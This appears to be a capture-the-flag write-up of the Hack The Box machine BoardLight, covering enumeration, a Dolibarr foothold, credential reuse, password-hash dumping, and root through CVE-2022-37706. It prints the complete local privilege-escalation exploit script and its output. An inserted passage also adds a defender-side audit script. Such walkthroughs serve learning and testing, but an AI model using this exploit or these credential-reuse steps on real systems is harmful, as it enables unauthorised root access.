#hackthebox #linux #easy
![[Pasted image 20250815224400.png]]
# Information Gathering - Nmap
I started off with scanning all TCP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:11 UTC
Nmap scan report for 10.10.11.11
Host is up (0.054s latency).
Not shown: 64993 closed tcp ports (reset), 540 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds
```
Then I scanned ports 22 and 80 again to gather more information.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:12 UTC
Nmap scan report for 10.10.11.11
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
```
I also scanned the top 10 UDP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:34 UTC
Nmap scan report for board.htb (10.10.11.11)
Host is up (0.047s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp closed snmp
445/udp closed microsoft-ds
631/udp closed ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
```
---
# Enumeration
##### HTTP - TCP 80
Navigating to the IP address in the browser reveals a website. The page introduces `Boardlight`, a cybersecurity consulting firm.
![[Pasted image 20250815201636.png]]
I looked everywhere on the page but couldn't find anything useful that could lead me to the next step. I ran `gobuster` but it didn't reveal much either. Then I fuzzed for `vhosts` and found one named `crm`.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -u http://$IP -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -fw 6243
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.11
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 63ms]
:: Progress: [4989/4989] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:12] :: Errors: 0 ::
```
I mapped `crm.board.htb` to the target IP address in the `/etc/hosts` file.
The `crm.board.htb` page has a login form in the middle and is hosting a service named `Dolibarr v17.0.0`. `Dolibarr` is an open source CRM solution.
![[Pasted image 20250815204813.png]]
![[Pasted image 20250815205057.png]]
# Initial Access - shell as `www-data`
I looked up `dolibarr 17.0.0 exploit` and got some hits. Apparently, there's a known vulnerability in this version of the software.
![[Pasted image 20250815205734.png]]
Got a reverse shell as `www-data` using the exploit!
![[Pasted image 20250815210234.png]]
Database credentials found in the config file under `htdocs/conf`: `dolibarrowner:serverfun2$2023!!`
![[Pasted image 20250815210935.png]]
```bash
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:54618 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 [::]:53925 [::]:*
udp UNCONN 0 0 [::]:5353 [::]:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
```
Relevant entries from `/etc/passwd`:
```bash
sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:127:134:MySQL Server,,,:/nonexistent:/bin/false
fwupd-refresh:x:128:135:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:129:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```
I was able to log in to the `mysql` client with the credentials I discovered earlier in the config file.
```bash
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -h localhost -u dolibarrowner -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 940
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
```
`show databases` revealed 3 databases. I selected the `dolibarr` db.
```sql
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
```
There are a lot of tables in the `dolibarr` db. The one I'm interested in is `llx_user`.
```sql
mysql> show tables;
+-------------------------------------------------------------+
| Tables_in_dolibarr |
+-------------------------------------------------------------+
| llx_accounting_account |
| llx_accounting_bookkeeping |
| llx_accounting_bookkeeping_tmp |
| llx_accounting_fiscalyear |
| llx_accounting_groups_account |
...
<SNIP>
```
`select * from llx_user` returned the following:
```sql
mysql> select * from llx_user;
<SNIP> (only the relevant columns of the very wide output are shown)
+-------+----------+-------+--------------------------------------------------------------+--------------+---------------------+-------------+
| rowid | login    | admin | pass_crypted                                                 | api_key      | datelastlogin       | iplastlogin |
+-------+----------+-------+--------------------------------------------------------------+--------------+---------------------+-------------+
|     1 | dolibarr |     1 | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL         | 2024-05-15 09:57:04 | 10.10.14.31 |
|     2 | admin    |     0 | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | yr6V3pXd9QEI | 2025-08-15 18:59:59 | 10.10.14.10 |
+-------+----------+-------+--------------------------------------------------------------+--------------+---------------------+-------------+
```
Because there are so many columns in the table, the raw output looks messy. Still, we discovered 2 users, their password hashes and 1 API key.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat hashes.txt
$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
```
I was not able to crack those hashes. Maybe I could have, but it was taking too long, which usually indicates that this is not the intended way of solving the box.
I hadn't thought to use the password I found earlier against `larissa`. I tried it and it let me in hahaha.
```bash
www-data@boardlight:~/html/crm.board.htb/scripts/user$ su larissa
Password:
larissa@boardlight:/var/www/html/crm.board.htb/scripts/user$ whoami
larissa
```
Found `user.txt` in `/home/larissa`.
```bash
larissa@boardlight:~$ cat user.txt
2a9...
```
# Privilege Escalation - shell as `root`
I looked around the target machine, and inside `/home/larissa` there were too many folders. I felt like looking through them would lead me down rabbit holes, so I decided to run `linPEAS` instead.
So I navigated to `/dev/shm` to transfer `linPEAS` from my kali to the target machine. Funnily enough, `linpeas.sh` and a `lin.txt` file, which appeared to be the output of `linPEAS`, were already there.
```bash
larissa@boardlight:/dev/shm$ ls
linpeas.sh lin.txt
```
![[Pasted image 20250815221133.png]]
```bash
larissa@boardlight:/dev/shm$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
```
I looked for files with the SUID bit set. I noticed 4 SUID binaries that all live under the same `enlightenment` directory.
```bash
larissa@boardlight:~/Downloads/esigned/esigned-html$ find / -type f -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
```
I was able to find the version of `Enlightenment` with `--version` option.
```bash
larissa@boardlight:/usr/lib/x86_64-linux-gnu$ enlightenment --version
ESTART: 0.00001 [0.00001] - Begin Startup
ESTART: 0.00130 [0.00129] - Signal Trap
ESTART: 0.00132 [0.00003] - Signal Trap Done
ESTART: 0.00327 [0.00194] - Eina Init
ESTART: 0.00684 [0.00358] - Eina Init Done
ESTART: 0.00689 [0.00004] - Determine Prefix
ESTART: 0.00812 [0.00124] - Determine Prefix Done
ESTART: 0.00816 [0.00004] - Environment Variables
ESTART: 0.00819 [0.00003] - Environment Variables Done
ESTART: 0.00822 [0.00002] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
```
I searched for `enlightenment 0.23.1 exploit` and came across [this GitHub repo](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit). The author is the one who discovered `CVE-2022-37706` and provides a step-by-step explanation of the vulnerability and exploit with clear, easy-to-follow instructions.
So I downloaded the exploit in my kali and copied it to the target machine.
![[Pasted image 20250815224118.png]]
This is what's inside the payload. I'll briefly explain how this payload works.
*The Problem*: `Enlightenment` includes a helper program called `enlightenment_sys` that is installed with the `SUID bit` set, and it doesn't properly handle certain file paths. If you give it a path that starts with `/dev/..` and contains a special character (like `;`), it doesn't sanitize the input.
*The exploit*: Because of that, you can inject commands into the way it calls other system utilities and trick `enlightenment_sys` into executing your own program/script as `root`.
*Step-By-Step*
1. Look for `enlightenment_sys` with the SUID bit set.
2. Prepare a malicious file (e.g., `/tmp/exploit`) that just runs `/bin/bash`.
3. Abuse the path handling: run `enlightenment_sys` with a path like `/dev/../tmp/;/tmp/exploit`. The `;` makes the system run `/tmp/exploit` as root.
4. Since `/tmp/exploit` just launches a shell, you end up with a root shell.
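As an added example that is not part of this writeup or the exploit author's repo, here is a defender-side check for the condition the steps above describe (it also covers the SUID listing earlier): it finds a setuid `enlightenment_sys`, parses the version out of `enlightenment --version` output, and reports the mitigation without ever running the helper. The fixed release `0.25.4` is assumed from the CVE record, not from this page, and the function names are mine.

```bash
#!/bin/bash
# Added example (not from the writeup): audit a filesystem tree for a setuid
# enlightenment_sys helper and compare the Enlightenment version against the
# assumed fixed release 0.25.4 (CVE-2022-37706). ROOT may be a staged tree.

# Numeric dotted-version comparison: returns 0 when $1 is older than $2.
version_lt() {
    local IFS=. i
    local -a a b
    read -ra a <<< "$1"
    read -ra b <<< "$2"
    for i in 0 1 2; do
        (( ${a[i]:-0} < ${b[i]:-0} )) && return 0
        (( ${a[i]:-0} > ${b[i]:-0} )) && return 1
    done
    return 1
}

# Extract "Version: X.Y.Z" from `enlightenment --version` output on stdin,
# ignoring the ESTART timing lines it also prints.
parse_version() {
    sed -n 's/^Version: \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# List setuid files whose path contains "enlightenment" under ROOT.
find_enlightenment_suid() {
    find "${1:-/}" -type f -perm -4000 -path '*enlightenment*' 2>/dev/null | sort
}

# Exit status: 0 = vulnerable setup found, 1 = not vulnerable, 2 = unknown.
audit_enlightenment_sys() {
    local root="${1:-/}" version="$2" fixed="0.25.4" sys
    sys=$(find_enlightenment_suid "$root" | grep '/enlightenment_sys$' || true)
    if [ -z "$sys" ]; then
        echo "OK: no setuid enlightenment_sys under $root"
        return 1
    fi
    if [ -z "$version" ]; then
        echo "WARN: $sys is setuid but the Enlightenment version is unknown"
        return 2
    fi
    if version_lt "$version" "$fixed"; then
        echo "VULNERABLE: $sys is setuid and Enlightenment $version < $fixed (CVE-2022-37706)"
        echo "  mitigation: chmod u-s '$sys' until Enlightenment is upgraded"
        return 0
    fi
    echo "OK: $sys is setuid but Enlightenment $version >= $fixed"
    return 1
}
```

On a live host you would run `audit_enlightenment_sys / "$(enlightenment --version 2>/dev/null | parse_version)"`; the exit status makes it usable from a compliance job.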
```bash
larissa@boardlight:/dev/shm$ cat exploit.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
```
A moment after I ran `exploit.sh`, I obtained a shell as `root`.
```bash
larissa@boardlight:/dev/shm$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
```
Found `root.txt`
```bash
# cat root.txt
2b4...
```